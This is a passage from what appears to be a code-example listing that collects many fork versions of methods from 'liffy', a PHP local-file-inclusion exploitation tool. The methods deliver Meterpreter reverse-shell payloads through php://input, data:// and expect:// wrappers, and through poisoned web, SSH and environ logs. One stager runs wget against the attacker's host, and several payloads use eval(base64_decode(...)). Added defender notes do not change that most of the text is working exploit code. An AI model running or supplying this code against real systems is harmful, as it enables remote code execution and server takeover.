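        The request URL is ``self.target + "php://input"``; the body is the
        generated /tmp file (``self.nostager``) or the formatted
        ``stager_payload``.

        Defender notes: ``php://input`` is only honoured by include when
        ``allow_url_include`` is enabled. ``php://input`` in a query string
        combined with a POST body containing PHP is the pattern to alert on.

        Exits with status 1 when the response code is not 200.
        """
        lhost, lport, shell = msf_payload()

        # Build php payload
        wrapper = "php://input"
        url = self.target + wrapper

        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = stager_payload.format(lhost, shell)

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            # Assuming if there is a server running on port 8000 hosting from /tmp
            print(t.red(" [!] ") + "Is Your Server Running?")
            print(
                t.yellow(" [*] ") +
                "To Launch Server: http-server /tmp -p 8000")
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        raw_input(
            t.blue(" [!] ") +
            "Press Enter To Continue When Your Metasploit Handler Is Running ..."
        )

        try:
            dr = requests.post(url, data=payload)
            if dr.status_code != 200:
                print(t.red(" [*] Unexpected HTTP Response "))
                sys.exit(1)
        except requests.exceptions.RequestException as input_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [*] HTTP Error ") + str(input_error))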
コード例 #17
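    def execute_expect(self):
        """Send one GET whose include value is an ``expect://`` command URL.

        The URL is ``self.target`` followed by ``expect://echo "<php>" | php``,
        with ``<php>`` taken from the generated /tmp file (``self.nostager``)
        or from the formatted ``stager_payload``.

        Defender notes: ``expect://`` is only available when PHP's optional
        expect extension is loaded; without it, or with an allow-list on the
        include parameter, the request has no effect. The literal
        ``expect://`` in a request URL is a strong indicator in access logs.

        Exits with status 1 when the response code is not 200.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        # Build payload
        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                source = payload_file.read()
            # Escape double quotes and dollar signs for the double-quoted echo.
            escaped = source.replace("\"", "\\\"").replace("$", "\\$")
            payload = "expect://echo \"" + quote_plus(escaped) + "\" | php"
            progressbar()
        else:
            payload = "expect://echo \"" + stager_payload.format(
                lhost, shell) + "\" | php"
            # format() is applied to the message, not to the result of print().
            print((
                t.red(" [!] ") + "Payload Is Located At: " +
                t.red("/tmp/{0}.php")).format(shell))
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()
        lfi = self.target + payload

        raw_input(
            t.blue(" [!] ") +
            "Press Enter To Continue When Your Metasploit Handler is Running ..."
        )

        try:
            r = requests.get(lfi)
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
                sys.exit(1)
        except requests.exceptions.RequestException as expect_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(expect_error))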
コード例 #18
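    def execute_logs(self):
        """Put PHP into a logged request header, then include the log file.

        First GET: ``self.target + self.location`` with the payload as the
        ``User-Agent`` header. Second GET (only after a 200): the same URL
        without the header, so that the included log is evaluated.

        Defender notes: this depends on a web-server log readable by the PHP
        process and on an include parameter that accepts arbitrary paths.
        ``<?php`` inside a logged User-Agent (the nostager form visibly starts
        with it) is the artefact to alert on; log files unreadable to the
        application user remove the precondition.
        """
        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            # The context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                source = payload_file.read()
            # The "base64" str codec is Python 2 only and wraps its output,
            # hence the newline removal.
            payload = "<?php eval(base64_decode('{0}')); ?>".format(
                source.encode('base64').replace("\n", ""))
            progressbar()
        else:
            payload = stager_payload.format(lhost, shell)
            # format() is applied to the message, not to the result of print().
            print((
                t.red(" [!] ") + "Payload Is Located At: " +
                t.red("/tmp/{0}.php")).format(shell))
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()
        lfi = self.target + self.location

        raw_input(
            t.blue(" [!] ") +
            "Press Enter To Continue When Your Metasploit Handler is Running ..."
        )
        try:
            headers = {'User-Agent': payload}
            r = requests.get(lfi, headers=headers)
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
            else:
                r = requests.get(lfi)  # pull down shell from poisoned logs
                if r.status_code != 200:
                    print(t.red(" [!] Unexpected HTTP Response "))
        except requests.exceptions.RequestException as access_error:
            # Append the error text instead of calling the formatted string.
            print(t.red(" [!] HTTP Error ") + str(access_error))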
コード例 #19
ファイル: core.py プロジェクト: rollys/liffy
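    def execute_input(self):
        """POST the payload to ``self.target`` with ``php://input`` appended.

        The request body is the generated ``/tmp/<shell>.php`` file
        (``self.nostager``) or the formatted ``stager_payload``.  The process
        exits with status 1 when the reply is not HTTP 200.

        Defensive context: PHP honours ``php://input`` inside an include only
        when ``allow_url_include`` is enabled, and the wrapper name appears in
        the requested URL, so it can be matched in access logs.
        """

        lhost, lport, shell = msf_payload()

        # Build php payload
        wrapper = "php://input"
        url = self.target + wrapper

        if self.nostager:
            # Context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = stager_payload.format(lhost, shell)

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            # Assuming if there is a server running on port 8000 hosting from /tmp
            print(t.red(" [!] ") + "Is Your Server Running?")
            print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler Is Running ...")

        try:
            dr = requests.post(url, data=payload)
            if dr.status_code != 200:
                print(t.red(" [*] Unexpected HTTP Response "))
                sys.exit(1)
        except requests.exceptions.RequestException as input_error:
            # The original called the value returned by t.red(); it is joined
            # with the error text instead so the failure is actually reported.
            print(t.red(" [*] HTTP Error ") + str(input_error))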
コード例 #20
ファイル: core.py プロジェクト: unicornFurnace/liffy
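    def execute_data(self):
        """Request ``self.target`` with a base64 ``data://`` wrapper appended.

        Prompts for the callback host and port, runs ``msfpayload`` to write
        ``/tmp/<shell>.php``, then embeds either that file (``self.nostager``)
        or a ``wget`` one-liner, base64- and URL-encoded, in
        ``data://text/html;base64,...``.

        Defensive context: PHP honours ``data://`` inside an include only when
        ``allow_url_include`` is enabled, and the wrapper name appears in the
        requested URL, so it can be matched in access logs.
        """

        # Arguments needed for Meterpreter
        lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
        lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

        # Generate random shell name
        g = Generator()
        shell = g.generate()

        print(t.green(" [*] ") + "Generating Data Wrapper")
        progressbar()
        print(t.red(" [!] ") + "Success!")
        print(t.green(" [*] ") + "Generating Metasploit Payload")
        progressbar()

        # msfpayload arguments
        # NOTE(review): the prompt answers are interpolated unvalidated into a
        # string that is run with shell=True on the operator's own machine.
        php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)

        # Generate shell
        msf = subprocess.Popen(php, shell=True)
        msf.wait()

        # Make sure payload was generated correctly
        if msf.returncode != 0:
            print(t.red(" [!] ") + "Error Generating MSF Payload ")
        else:
            print(t.red(" [!] ") + "Success! ")

        print((t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell))

        # Build payload
        if self.nostager:
            # Context manager closes the file even if read() raises.
            with open("/tmp/{0}.php".format(shell), "r") as payload_file:
                payload = payload_file.read()
        else:
            payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell)
        encoded_payload = quote_plus(payload.encode('base64'))

        # Build data wrapper
        data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
        lfi = self.target + data_wrapper

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        if self.nostager:
            raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
        else:
            # Assuming if there is a server running on port 8000 hosting from /tmp
            print(t.red(" [!] ") + "Is Your Server Running?")
            print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        # The request now sits inside the try block; in the original it ran
        # before the try, so the except clause could never see its failures.
        try:
            data_request = requests.get(lfi)
            if data_request.status_code != 200:
                print(t.red(" [!] ") + "Unexpected HTTP Response ")
        except requests.exceptions.RequestException as data_error:
            print(t.red(" [!] ") + "HTTP Error: %s" % data_error)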
コード例 #21
ファイル: core.py プロジェクト: Yas3r/liffy
    def execute_ssh(self):
        """Run the local ssh client with a PHP snippet as login name, then request the URL.

        The ssh call targets the host part of ``self.target``.  The follow-up
        GET goes to ``self.target`` + ``self.location`` with the URL-encoded
        contents of ``/tmp/<shell>.php`` in a ``code`` parameter; with
        ``self.relative`` set, a traversal prefix is inserted before
        ``self.location``.

        Defensive context: the snippet is sent as the SSH user name, so on the
        receiving host it would surface as a login attempt for a user name
        containing ``<?php`` -- presumably in the sshd authentication log that
        ``self.location`` is meant to point at (not visible here).
        """

        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport)
        handle.handler()

        payload_file = open('/tmp/{0}.php'.format(shell), 'r')

        payload_stage2 = quote_plus(payload_file.read())
        payload_file.close()
        payload = "<?php eval(\\$_GET['code'])?>"

        print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Start SSH Log Poisoning ..." + "\n")

        host = urlparse.urlsplit(self.target).netloc
        # Runs through the local shell; the PHP snippet is the user-name part.
        system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))

        print("\n")

        print(t.red("[{0}] ".format(datetime.datetime.now())) + "Executing Shell!")

        """ Attempt traverse """

        # NOTE(review): requests.get() does not raise HTTPError on its own, and
        # connection failures are other RequestException subclasses, so the
        # except clauses below will not see them.
        # NOTE(review): `print t.red(...)(access_error)` calls the value that
        # t.red() returns; t.red() results are concatenated with str above, so
        # this looks like it would raise TypeError -- confirm.
        if not self.relative:
            lfi = self.target + self.location + '&code={0}'.format(payload_stage2)
            if self.cookies:
                f_cookies = format_cookies(self.cookies)
                try:
                    r = requests.get(lfi, cookies=f_cookies)
                    if r.status_code != 200:
                        print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                except requests.HTTPError as access_error:
                    print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
            else:
                try:
                    r = requests.get(lfi)
                    if r.status_code != 200:
                        print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                except requests.HTTPError as access_error:
                    print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)

        else:
            # Every path through the loop body ends in sys.exit(), so the
            # process terminates after the first request (counter == 0).
            for path_traversal_sequence in path_traversal_sequences:
                for counter in xrange(10):
                    lfi = self.target + path_traversal_sequence * counter + self.location + '&code={0}'.format(
                        payload_stage2)
                    if self.cookies:
                        f_cookies = format_cookies(self.cookies)
                        try:
                            r = requests.get(lfi, cookies=f_cookies)
                            if r.status_code != 200:
                                print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                                sys.exit(1)
                            else:
                                sys.exit(0)
                        except requests.HTTPError as access_error:
                            print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
                            sys.exit(1)
                    else:
                        try:
                            r = requests.get(lfi)
                            if r.status_code != 200:
                                print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                                sys.exit(1)
                            else:
                                sys.exit(0)
                        except requests.HTTPError as access_error:
                            print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
                            sys.exit(1)
コード例 #22
ファイル: core.py プロジェクト: Yas3r/liffy
    def execute_environ(self):
        """Send the payload in a ``User-Agent`` header to ``self.target + self.location``.

        The header value is either ``/tmp/<shell>.php`` wrapped as
        ``eval(base64_decode(...))`` (``self.nostager``) or the formatted
        ``stager_payload``.  With ``self.relative`` set, a traversal prefix is
        inserted before ``self.location``.  Every request path ends in
        ``sys.exit``.

        Defensive context: in the non-staged branch the ``User-Agent`` starts
        with ``<?php``, a direct indicator wherever that header is logged.
        Presumably ``self.location`` names a process-environment file (going
        by the method name) -- not visible here.
        """

        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport)
        handle.handler()

        """ Handle staging """

        if self.nostager:
            print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "No-Staged Selected!")
            payload_file = open("/tmp/{0}.php".format(shell), "r")
            payload = "<?php eval(base64_decode('{0}')); ?>".format(
                payload_file.read().encode('base64').replace("\n", ""))
            payload_file.close()
        else:
            payload = stager_payload.format(lhost, shell)
            progressbar()
            try:
                p = subprocess.Popen(['python http_server.py'], shell=True, stdout=subprocess.PIPE)
                # communicate() waits for the child process to exit.
                p.communicate()
            except OSError as os_error:
                # NOTE(review): the parenthesised text is called with
                # os_error as its argument; likely a TypeError -- confirm.
                print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error"))(os_error)

        """ Build LFI """

        lfi = self.target + self.location
        headers = {'User-Agent': payload}

        # NOTE(review): formats the datetime.datetime class itself, not
        # datetime.datetime.now(), so the prompt shows the class repr.
        raw_input(t.cyan(
            "[{0}] ".format(datetime.datetime)) + "Press Enter To Continue When Your Metasploit Handler is Running ...")
        # NOTE(review): `print t.red(...)(access_error)` below calls the value
        # t.red() returns; t.red()/t.cyan() results are concatenated with str
        # above, so this looks like it would raise TypeError -- confirm.
        try:
            if not self.relative:
                if self.cookies:
                    f_cookies = format_cookies(self.cookies)
                    try:
                        r = requests.get(lfi, headers=headers, cookies=f_cookies)
                        if r.status_code != 200:
                            print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                            sys.exit(1)
                        else:
                            sys.exit(0)
                    except requests.RequestException as access_error:
                        print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
                        sys.exit(1)
                else:
                    try:
                        r = requests.get(lfi, headers=headers)
                        if r.status_code != 200:
                            print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                            sys.exit(1)
                        else:
                            sys.exit(0)
                    except requests.RequestException as access_error:
                        print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
                        sys.exit(1)
            else:
                # Every path through the loop body ends in sys.exit(), so the
                # process terminates after the first request (counter == 0).
                for path_traversal_sequence in path_traversal_sequences:
                    for counter in xrange(10):
                        lfi = self.target + path_traversal_sequence * counter + self.location
                        if self.cookies:
                            f_cookies = format_cookies(self.cookies)
                            try:
                                r = requests.get(lfi, headers=headers, cookies=f_cookies)
                                if r.status_code != 200:
                                    print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                                    sys.exit(1)
                                else:
                                    sys.exit(0)
                            except requests.RequestException as access_error:
                                print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
                                sys.exit(1)
                        else:
                            try:
                                r = requests.get(lfi, headers=headers)
                                if r.status_code != 200:
                                    print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
                                    sys.exit(1)
                                else:
                                    sys.exit(0)
                            except requests.RequestException as access_error:
                                print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
                                sys.exit(1)
        # SystemExit is not an Exception subclass, so the sys.exit() calls
        # above pass through this handler.
        except Exception as unknown_error:
            print t.red("[{0}] Unknown Error ".format(datetime.datetime.now()))(unknown_error)
            sys.exit(1)
コード例 #23
ファイル: core.py プロジェクト: ksmaheshkumar/liffy
    def execute_data(self):
        """Request ``self.target`` with a base64 ``data://`` wrapper appended.

        The wrapper carries either the generated ``/tmp/<shell>.php`` file
        (``self.nostager``) or the formatted ``stager_payload``, base64- and
        URL-encoded.  Cookies from ``self.cookies`` are sent when present.

        Defensive context: PHP honours ``data://`` inside an include only when
        ``allow_url_include`` is enabled, and the wrapper name appears in the
        requested URL, so it can be matched in access logs.
        """

        lhost, lport, shell = msf_payload()
        """ Build payload """
        """ Handle staging """

        if self.nostager:
            payload_file = open("/tmp/{0}.php".format(shell), "r")
            payload = payload_file.read()
            payload_file.close()
        else:
            payload = stager_payload.format(lhost, shell)

        encoded_payload = quote_plus(payload.encode('base64'))
        """ Build data wrapper """

        data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
        lfi = self.target + data_wrapper

        handle = Payload(lhost, lport)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            print(
                t.cyan("[{0}] ".format(datetime.datetime.now())) +
                "Starting Web Server ... ")
            progressbar()
            try:
                p = subprocess.Popen(['python http_server.py'],
                                     shell=True,
                                     stdout=subprocess.PIPE)
                # communicate() waits for the child process to exit.
                p.communicate()
            except OSError as os_error:
                # NOTE(review): the parenthesised text is called with
                # os_error as its argument; likely a TypeError -- confirm.
                print(
                    t.red("[{0}] ".format(datetime.datetime.now()) +
                          "Process Error"))(os_error)

        raw_input(
            t.red("[{0}] ".format(datetime.datetime.now())) +
            "Press Enter To Continue When Your Metasploit Handler is Running ..."
        )
        """ LFI payload that downloads the shell with try block for actual
            attack """

        # NOTE(review): requests.get() does not raise HTTPError on its own, and
        # connection failures are other RequestException subclasses, so the
        # except clauses below will not see them.  Their print(...)(data_error)
        # form also calls the printed text -- likely a TypeError; confirm.
        if self.cookies:
            f_cookies = format_cookies(self.cookies)
            try:
                data_request = requests.get(lfi, cookies=f_cookies)
                if data_request.status_code != 200:
                    print(
                        t.red("[{0}] ".format(datetime.datetime.now())) +
                        "Unexpected HTTP Response ")
                    sys.exit(1)
                else:
                    sys.exit(0)
            except requests.HTTPError as data_error:
                print(
                    t.red("[{0}] ".format(datetime.datetime.now())) +
                    "HTTP Error")(data_error)
                sys.exit(1)
        else:
            try:
                data_request = requests.get(lfi)
                if data_request.status_code != 200:
                    # Unlike the cookie branch, this path does not exit with
                    # status 1; the method simply returns.
                    print(
                        t.red("[{0}] ".format(datetime.datetime.now())) +
                        "Unexpected HTTP Response ")
                else:
                    sys.exit(0)
            except requests.HTTPError as data_error:
                print(
                    t.red("[{0}] ".format(datetime.datetime.now())) +
                    "HTTP Error")(data_error)
                sys.exit(1)
コード例 #24
ファイル: core.py プロジェクト: ksmaheshkumar/liffy
    def execute_ssh(self):
        """Run the local ssh client with a PHP snippet as login name, then request the URL.

        The ssh call targets the host part of ``self.target``.  The follow-up
        GET goes to ``self.target`` + ``self.location`` with the URL-encoded
        contents of ``/tmp/<shell>.php`` in a ``code`` parameter; with
        ``self.relative`` set, a traversal prefix is inserted before
        ``self.location``.

        Defensive context: the snippet is sent as the SSH user name, so on the
        receiving host it would surface as a login attempt for a user name
        containing ``<?php`` -- presumably in the sshd authentication log that
        ``self.location`` is meant to point at (not visible here).
        """

        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport)
        handle.handler()

        payload_file = open('/tmp/{0}.php'.format(shell), 'r')

        payload_stage2 = quote_plus(payload_file.read())
        payload_file.close()
        payload = "<?php eval(\\$_GET['code'])?>"

        print(
            t.cyan("[{0}] ".format(datetime.datetime.now())) +
            "Start SSH Log Poisoning ..." + "\n")

        host = urlparse.urlsplit(self.target).netloc
        # Runs through the local shell; the PHP snippet is the user-name part.
        system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))

        print("\n")

        print(
            t.red("[{0}] ".format(datetime.datetime.now())) +
            "Executing Shell!")
        """ Attempt traverse """

        # NOTE(review): requests.get() does not raise HTTPError on its own, and
        # connection failures are other RequestException subclasses, so the
        # except clauses below will not see them.
        # NOTE(review): `print t.red(...)(access_error)` calls the value that
        # t.red() returns; t.red() results are concatenated with str above, so
        # this looks like it would raise TypeError -- confirm.
        if not self.relative:
            lfi = self.target + self.location + '&code={0}'.format(
                payload_stage2)
            if self.cookies:
                f_cookies = format_cookies(self.cookies)
                try:
                    r = requests.get(lfi, cookies=f_cookies)
                    if r.status_code != 200:
                        print(
                            t.red("[{0}] Unexpected HTTP Response ".format(
                                datetime.datetime.now())))
                except requests.HTTPError as access_error:
                    print t.red("[{0}] HTTP Error ".format(
                        datetime.datetime.now()))(access_error)
            else:
                try:
                    r = requests.get(lfi)
                    if r.status_code != 200:
                        print(
                            t.red("[{0}] Unexpected HTTP Response ".format(
                                datetime.datetime.now())))
                except requests.HTTPError as access_error:
                    print t.red("[{0}] HTTP Error ".format(
                        datetime.datetime.now()))(access_error)

        else:
            # Every path through the loop body ends in sys.exit(), so the
            # process terminates after the first request (counter == 0).
            for path_traversal_sequence in path_traversal_sequences:
                for counter in xrange(10):
                    lfi = self.target + path_traversal_sequence * counter + self.location + '&code={0}'.format(
                        payload_stage2)
                    if self.cookies:
                        f_cookies = format_cookies(self.cookies)
                        try:
                            r = requests.get(lfi, cookies=f_cookies)
                            if r.status_code != 200:
                                print(
                                    t.red("[{0}] Unexpected HTTP Response ".
                                          format(datetime.datetime.now())))
                                sys.exit(1)
                            else:
                                sys.exit(0)
                        except requests.HTTPError as access_error:
                            print t.red("[{0}] HTTP Error ".format(
                                datetime.datetime.now()))(access_error)
                            sys.exit(1)
                    else:
                        try:
                            r = requests.get(lfi)
                            if r.status_code != 200:
                                print(
                                    t.red("[{0}] Unexpected HTTP Response ".
                                          format(datetime.datetime.now())))
                                sys.exit(1)
                            else:
                                sys.exit(0)
                        except requests.HTTPError as access_error:
                            print t.red("[{0}] HTTP Error ".format(
                                datetime.datetime.now()))(access_error)
                            sys.exit(1)
コード例 #25
ファイル: core.py プロジェクト: ksmaheshkumar/liffy
    def execute_environ(self):
        """Send the payload in a ``User-Agent`` header to ``self.target + self.location``.

        The header value is either ``/tmp/<shell>.php`` wrapped as
        ``eval(base64_decode(...))`` (``self.nostager``) or the formatted
        ``stager_payload``.  With ``self.relative`` set, a traversal prefix is
        inserted before ``self.location``.  Every request path ends in
        ``sys.exit``.

        Defensive context: in the non-staged branch the ``User-Agent`` starts
        with ``<?php``, a direct indicator wherever that header is logged.
        Presumably ``self.location`` names a process-environment file (going
        by the method name) -- not visible here.
        """

        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport)
        handle.handler()
        """ Handle staging """

        if self.nostager:
            print(
                t.cyan("[{0}] ".format(datetime.datetime.now())) +
                "No-Staged Selected!")
            payload_file = open("/tmp/{0}.php".format(shell), "r")
            payload = "<?php eval(base64_decode('{0}')); ?>".format(
                payload_file.read().encode('base64').replace("\n", ""))
            payload_file.close()
        else:
            payload = stager_payload.format(lhost, shell)
            progressbar()
            try:
                p = subprocess.Popen(['python http_server.py'],
                                     shell=True,
                                     stdout=subprocess.PIPE)
                # communicate() waits for the child process to exit.
                p.communicate()
            except OSError as os_error:
                # NOTE(review): the parenthesised text is called with
                # os_error as its argument; likely a TypeError -- confirm.
                print(
                    t.red("[{0}] ".format(datetime.datetime.now()) +
                          "Process Error"))(os_error)
        """ Build LFI """

        lfi = self.target + self.location
        headers = {'User-Agent': payload}

        # NOTE(review): formats the datetime.datetime class itself, not
        # datetime.datetime.now(), so the prompt shows the class repr.
        raw_input(
            t.cyan("[{0}] ".format(datetime.datetime)) +
            "Press Enter To Continue When Your Metasploit Handler is Running ..."
        )
        # NOTE(review): `print t.red(...)(access_error)` below calls the value
        # t.red() returns; t.red()/t.cyan() results are concatenated with str
        # above, so this looks like it would raise TypeError -- confirm.
        try:
            if not self.relative:
                if self.cookies:
                    f_cookies = format_cookies(self.cookies)
                    try:
                        r = requests.get(lfi,
                                         headers=headers,
                                         cookies=f_cookies)
                        if r.status_code != 200:
                            print(
                                t.red("[{0}] Unexpected HTTP Response ".format(
                                    datetime.datetime.now())))
                            sys.exit(1)
                        else:
                            sys.exit(0)
                    except requests.RequestException as access_error:
                        print t.red("[{0}] HTTP Error ".format(
                            datetime.datetime.now()))(access_error)
                        sys.exit(1)
                else:
                    try:
                        r = requests.get(lfi, headers=headers)
                        if r.status_code != 200:
                            print(
                                t.red("[{0}] Unexpected HTTP Response ".format(
                                    datetime.datetime.now())))
                            sys.exit(1)
                        else:
                            sys.exit(0)
                    except requests.RequestException as access_error:
                        print t.red("[{0}] HTTP Error ".format(
                            datetime.datetime.now()))(access_error)
                        sys.exit(1)
            else:
                # Every path through the loop body ends in sys.exit(), so the
                # process terminates after the first request (counter == 0).
                for path_traversal_sequence in path_traversal_sequences:
                    for counter in xrange(10):
                        lfi = self.target + path_traversal_sequence * counter + self.location
                        if self.cookies:
                            f_cookies = format_cookies(self.cookies)
                            try:
                                r = requests.get(lfi,
                                                 headers=headers,
                                                 cookies=f_cookies)
                                if r.status_code != 200:
                                    print(
                                        t.red(
                                            "[{0}] Unexpected HTTP Response ".
                                            format(datetime.datetime.now())))
                                    sys.exit(1)
                                else:
                                    sys.exit(0)
                            except requests.RequestException as access_error:
                                print t.red("[{0}] HTTP Error ".format(
                                    datetime.datetime.now()))(access_error)
                                sys.exit(1)
                        else:
                            try:
                                r = requests.get(lfi, headers=headers)
                                if r.status_code != 200:
                                    print(
                                        t.red(
                                            "[{0}] Unexpected HTTP Response ".
                                            format(datetime.datetime.now())))
                                    sys.exit(1)
                                else:
                                    sys.exit(0)
                            except requests.RequestException as access_error:
                                print t.red("[{0}] HTTP Error ".format(
                                    datetime.datetime.now()))(access_error)
                                sys.exit(1)
        # SystemExit is not an Exception subclass, so the sys.exit() calls
        # above pass through this handler.
        except Exception as unknown_error:
            print t.red("[{0}] Unknown Error ".format(
                datetime.datetime.now()))(unknown_error)
            sys.exit(1)
コード例 #26
    def execute_environ(self):
        """Send the payload in a ``User-Agent`` header to ``self.target + self.location``.

        The header value is either ``/tmp/<shell>.php`` wrapped as
        ``eval(base64_decode(...))`` (``self.nostager``) or the formatted
        ``stager_payload``.  With ``self.relative`` set, one request is sent
        per traversal sequence and repetition count (0-9); nothing in this
        version stops the loop early.

        Defensive context: in the non-staged branch the ``User-Agent`` starts
        with ``<?php``, a direct indicator wherever that header is logged, and
        the relative mode produces a burst of near-identical requests that
        differ only in the number of traversal prefixes.
        """

        lhost, lport, shell = msf_payload()

        handle = Payload(lhost, lport, self.target, shell)
        handle.handler()

        """ Handle staging """

        if self.nostager:
            payload_file = open("/tmp/{0}.php".format(shell),"r")
            payload = "<?php eval(base64_decode('{0}')); ?>".format(payload_file.read().encode('base64').replace("\n", ""))
            payload_file.close()
            progressbar()
        else:
            payload = stager_payload.format(lhost, shell)
            print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
            print(t.green(" [*] ") + "Downloading Shell")
            progressbar()

        """ Build LFI """

        lfi = self.target + self.location
        headers = {'User-Agent': payload}

        raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")
        # NOTE(review): `print t.red(...)(access_error)` below calls the value
        # t.red() returns; t.red() results are concatenated with str above, so
        # this looks like it would raise TypeError, which the outer
        # `except Exception` would then catch and hit again -- confirm.
        try:
            if not self.relative:
                if self.cookies:
                    f_cookies = format_cookies(self.cookies)
                    try:
                        r = requests.get(lfi, headers=headers, cookies=f_cookies)
                        if r.status_code != 200:
                            print(t.red(" [!] Unexpected HTTP Response "))
                    except requests.RequestException as access_error:
                        print t.red(" [!] HTTP Error ")(access_error)
                else:
                    try:
                        r = requests.get(lfi, headers=headers)
                        if r.status_code != 200:
                            print(t.red(" [!] Unexpected HTTP Response "))
                    except requests.RequestException as access_error:
                        print t.red(" [!] HTTP Error ")(access_error)
            else:
                for path_traversal_sequence in path_traversal_sequences:
                    for counter in xrange(10):
                        lfi = self.target + path_traversal_sequence*counter + self.location
                        if self.cookies:
                            f_cookies = format_cookies(self.cookies)
                            try:
                                r = requests.get(lfi, headers=headers, cookies=f_cookies)
                                if r.status_code != 200:
                                    print(t.red(" [!] Unexpected HTTP Response "))
                            except requests.RequestException as access_error:
                                print t.red(" [!] HTTP Error ")(access_error)
                        else:
                            try:
                                r = requests.get(lfi, headers=headers)
                                if r.status_code != 200:
                                    print(t.red(" [!] Unexpected HTTP Response "))
                            except requests.RequestException as access_error:
                                print t.red(" [!] HTTP Error ")(access_error)
        except Exception as unknown_error:
            print t.red(" [!] Unknown Error ")(unknown_error)
コード例 #27
ファイル: core.py プロジェクト: ksmaheshkumar/liffy
    def execute_input(self):
        """POST the payload to ``self.target`` with ``php://input`` appended.

        The request body is the generated ``/tmp/<shell>.php`` file
        (``self.nostager``) or the formatted ``stager_payload``.  Cookies from
        ``self.cookies`` are sent when present.  Exits 0 on HTTP 200 and 1
        otherwise.

        Defensive context: PHP honours ``php://input`` inside an include only
        when ``allow_url_include`` is enabled, and the wrapper name appears in
        the requested URL, so it can be matched in access logs.
        """

        lhost, lport, shell = msf_payload()
        """ Build payload """

        wrapper = "php://input"
        url = self.target + wrapper
        """ Handle staging """

        if self.nostager:
            payload_file = open("/tmp/{0}.php".format(shell), "r")
            payload = payload_file.read()
            payload_file.close()
        else:
            payload = stager_payload.format(lhost, shell)

        handle = Payload(lhost, lport)
        handle.handler()

        if self.nostager:
            progressbar()
        else:
            print(
                t.cyan("[{0}] ".format(datetime.datetime.now())) +
                "Starting Web Server ... ")
            progressbar()
            try:
                # Started without waiting; the child keeps running alongside
                # this process.
                subprocess.Popen(['python http_server.py'], shell=True)
            except OSError as os_error:
                # NOTE(review): the parenthesised text is called with
                # os_error as its argument; likely a TypeError -- confirm.
                print(
                    t.red("[{0}] ".format(datetime.datetime.now()) +
                          "Process Error"))(os_error)

        raw_input(
            t.cyan("[{0}] ".format(datetime.datetime.now())) +
            "Press Enter To Continue When Your Metasploit Handler Is Running ..."
        )
        """ Handle cookies """

        # NOTE(review): requests.post() does not raise HTTPError on its own,
        # and connection failures are other RequestException subclasses, so
        # the except clauses below will not see them.  Their
